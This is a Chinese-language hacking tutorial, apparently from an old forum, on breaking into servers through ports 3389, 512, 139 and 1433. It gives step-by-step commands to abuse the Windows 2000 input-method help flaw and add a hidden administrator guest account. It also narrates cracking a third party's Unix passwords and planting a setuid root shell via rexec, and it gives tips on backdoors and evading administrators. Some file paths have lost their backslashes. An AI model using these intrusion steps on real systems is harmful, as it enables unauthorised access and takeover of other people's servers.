3389端口的入侵
　　　　　　　　　　　　　　　　　
　　由于微軟對中國產(chǎn)品不付責(zé)任的態(tài)度，使得安裝了終端服務(wù)和全拼的w2k服務(wù)器存在著遠(yuǎn)程登陸并能獲取超級用戶權(quán)限的嚴(yán)重漏洞。
　　其過程如下：
　　　　　　　　　　　　　　　　　
　　1.掃描3389 port終端服務(wù)默認(rèn)；2.用終端客戶端程序進(jìn)行連接；3.按ctrl shift調(diào)出全拼輸入法（其他似乎不行），點鼠標(biāo)右鍵（如果其幫助菜單發(fā)灰，就趕快趕下家吧，人家打補丁了），點幫助，點輸入法入門；4.在“選項”菜單上點右鍵——>跳轉(zhuǎn)到URL“，輸入：c：winntsystem32cmd.exe.（如果不能確定NT系統(tǒng)目錄，則輸入：c：或d：……進(jìn)行查找確定）；5.選擇”保存到磁盤“選擇目錄：c：inetpubs，因?qū)嶋H上是對方服務(wù)器上文件自身的復(fù)制操作，所以這個過程很快就會完成；6.打開IE，輸入：http://ip/s/cmd.exe？/c dir怎么樣？有cmd.exe文件了吧？這我們就完成了第一步；7.http://ip/s/cmd.exe？/c echo net user guest /active：yes>go.bat 8.http://ip/s/cmd.exe？/c echo net user guest elise》go.bat 9.http://ip/s/cmd.exe？/c echo net localgroup administrators /add guest》go.bat 10.http://ip/s/cmd.exe？/c type go.bat看看我們的批文件內(nèi)容是否如下：
　　　　　　　　　　　　　　　　　
　　net user guest /active：yes net user guest elise net localgroup administrators /add guest 11.在“選項”菜單上點右鍵——>跳轉(zhuǎn)到URL“，輸入：c：inetpubsgo.bat ——>在磁盤當(dāng)前位置執(zhí)行；12.呵呵，大功告成啦，這樣我們就激活了服務(wù)器的geust帳戶，密碼為：elise，超級用戶呢?。ㄎ蚁矚gguest而不是建立新帳戶，這樣似乎不易被發(fā)現(xiàn)些），這樣你就可用IPC$連接，想怎樣做就怎樣做了，當(dāng)然，你也可用guest直接登陸到他的服務(wù)器，到他機器上去跳舞吧：-）
　　　　　　　　　　　　　　　　　
　　注意事項：1.當(dāng)你用終端客戶端程序登陸到他的服務(wù)器時，你的所有操作不會在他的機器上反應(yīng)出來，但如果他正打開了終端服務(wù)管理器，你就慘了了：（這時他能看到你所打開的進(jìn)程id、程序映象，你的ip及機器名，并能發(fā)消息給你！
　　2.當(dāng)你連接時，會加重對方服務(wù)器的負(fù)荷，非常容易造成對方死機和斷線，所以你的操作快點為妙。
　　3.盡快做好后門，暫時不要上傳任何程序，一是防止斷線，二是防止對方打上補?。?
　　個人觀點：1.在IE下，所擁有的只是iusr_machine權(quán)限，因而，你不要設(shè)想去做越權(quán)的事情，如啟動telnet、木馬等；2.url的跳轉(zhuǎn)下，你將擁有超級用戶的權(quán)限，好好利用吧3.跳轉(zhuǎn)到哪個目錄下，通常只能查看、執(zhí)行當(dāng)前目錄的文件，不能進(jìn)入到子目錄，如想進(jìn)入，再跳一次吧?。海?
　　4.此法似乎與對方的防火墻無關(guān)哦！
　　5.據(jù)本人實際操作，發(fā)現(xiàn)極易斷線，但應(yīng)與占用服務(wù)器資源無關(guān)。對方是384M RAM PIII，是靜態(tài)IP，主要是做數(shù)據(jù)庫服務(wù)器，RAID硬盤，SCSI CD ROM，開機18天了，02：00進(jìn)去時，仍時常吊線。
　　　　　　　　　　　　　　　　　
　　堵漏辦法：1.打補丁；2.刪掉全拼輸入法，用標(biāo)準(zhǔn)就成了嘛^_^；3.服務(wù)中關(guān)掉：Terminal Services，服務(wù)名稱：TermService，對應(yīng)程序名：system32termsrv.exe；
　　　　　　　　　　　　　　　　　
　　　　　　　　　　　　　　　　　
　　512端口入侵
　　　　　　　　　　　　　　　　　
　　已經(jīng)是第六十幾天了，我的Celeron 533仍不知疲倦的跑著JOHN……我是無意中注意到這個網(wǎng)站的，當(dāng)時只是想看一下，方法是各位大蝦都會的FINGER，然后猜用戶口令進(jìn)去的。進(jìn)去之后PASSWD也沒有SHADOWN，直接就可以看到，該系統(tǒng)用的是Digital unix系統(tǒng)，從PASSWD看得出里面的用戶只有兩個組：root和users，我猜中的就是一users級別的，發(fā)現(xiàn)這個級別的用戶幾乎沒有什么權(quán)限，TELNET上去后發(fā)現(xiàn)/USR/USERS/XXX是各用戶的HOME，而它們的屬性全是drwx——，也就是說這里的用戶是互不信任的關(guān)系（這一點大家在各免費主頁服務(wù)器上經(jīng)?？梢钥吹剑磥聿鲁鲈俣嘤脩艏壙诹钜矝]有用的。
　　　　　　　　　　　　　　　　　
　　　　　　　　　　　　　　　　　
　　root級的用戶只有兩名：root和shut.root我用john已跑了60多天，顯然不可能再跑出來了，但幸運的是shut口令已跑出來了。我毫不猶豫的telnet上去——然后，網(wǎng)站就關(guān)閉了！@#~！#^%，我真笨，怎么沒想到shut口令是干什么的？
　　　　　　　　　　　　　　　　　
　　　　　　　　　　　　　　　　　
　　網(wǎng)站很快就又開啟了，我發(fā)現(xiàn)shut口令還是沒改！這個網(wǎng)管是怎么當(dāng)?shù)模到y(tǒng)關(guān)了也不查一下原因！很顯然，這個網(wǎng)站上只有root是有水平的，但他與服務(wù)器可能不在同地，對于開、關(guān)機之類的事情不能直接操縱，與是給當(dāng)?shù)氐牟僮鲉T一個root級帳號，然后在。profile文件中做了一個shell，使得帳號一登錄就自動關(guān)系統(tǒng)。看看系統(tǒng)這么周密的設(shè)計，我想root設(shè)計這個shell時絕對關(guān)掉了path，所以我不打算在優(yōu)先的path路徑中放一同名的shell來阻止它。我如果能改掉這個文件再telnet上去不就是root級了嗎？
　　　　　　　　　　　　　　　　　
　　但是shut的HOME目錄是drwx——，別的帳號根本進(jìn)不去。沒關(guān)系，我試試ftp，530 user shut access denined（被拒絕），users組可以ftp上去同樣進(jìn)不了shut目錄。而且該網(wǎng)站根本就沒有開WWW服務(wù)，怎么辦？為這個網(wǎng)站陸陸續(xù)續(xù)研究了許久，我總是樂觀的鼓勵自己，“起碼我已經(jīng)知道幾十種進(jìn)不去的方法了……”。“真正的黑客從來都是把困難當(dāng)作樂趣，敞開的大門你請他進(jìn)他都不進(jìn)呢！”如此六十多天過去了，只到有一天……
　　　　　　　　　　　　　　　　　
　　我再一次用haktek掃描該網(wǎng)站，結(jié)果如下：Port 21 found. Desc='ftp' Port 23 found. Desc='telnet' Port 25 found. Desc='smtp' Port 79 found. Desc='finger' Port 111 found. Desc='portmap/sunrpc' Port 512 found. Desc='biff/exec' Port 513 found. Desc='login/who' Port 514 found. Desc='shell/syslog' Port 515 found. Desc='printer' Port 1024 found. Port 1025 found. Port 1526 found. Port 1528 found.
　　　　　　　　　　　　　　　　　
　　一個以前一直沒有注意的Port 512引起我的注意，這個端口是什么時候開的？要知道它可以讓用戶不登錄就可以運行服務(wù)器上的命令！?。≮s緊試試！
　　　　　　　　　　　　　　　　　
　　打開一個軟件winrsh32，填入user和password，在命令中填上ls -la，點運行哇，文件全列出來了，剩下的就簡單了：cp /bin/sh /tmp/.temp；chown root /tmp/.temp；chmod 4755 /tmp/.temp.然后再用那個破掉的user級帳號telnet，cd/tmp；。temp.當(dāng)#映入眼簾時，心卻往下一沉，我突然感到一絲落寂……可惜這個root一世小心，卻毀在了讓shut可以使用512端口上?？磥砥茐囊粋€世界總是比建立一個世界簡單……
　　39端口入侵139端口入侵139端口的入侵，主要是通過建立空連接，而獲得用戶名和共享名，接著用字典法或窮舉法來猜測ADMINISTRATORS的密碼，這樣可獲得最高權(quán)限。
　　解決方法：1、禁止匿名共享。
　　2、禁止管理共享。
　　1433端口入侵1433端口入侵1433端口的入侵，主要是利用MS SQL SERVER默認(rèn)sa的密碼是空，通過遠(yuǎn)程執(zhí)行命令而達(dá)到目的，或通過窮舉法猜測密碼

最新評論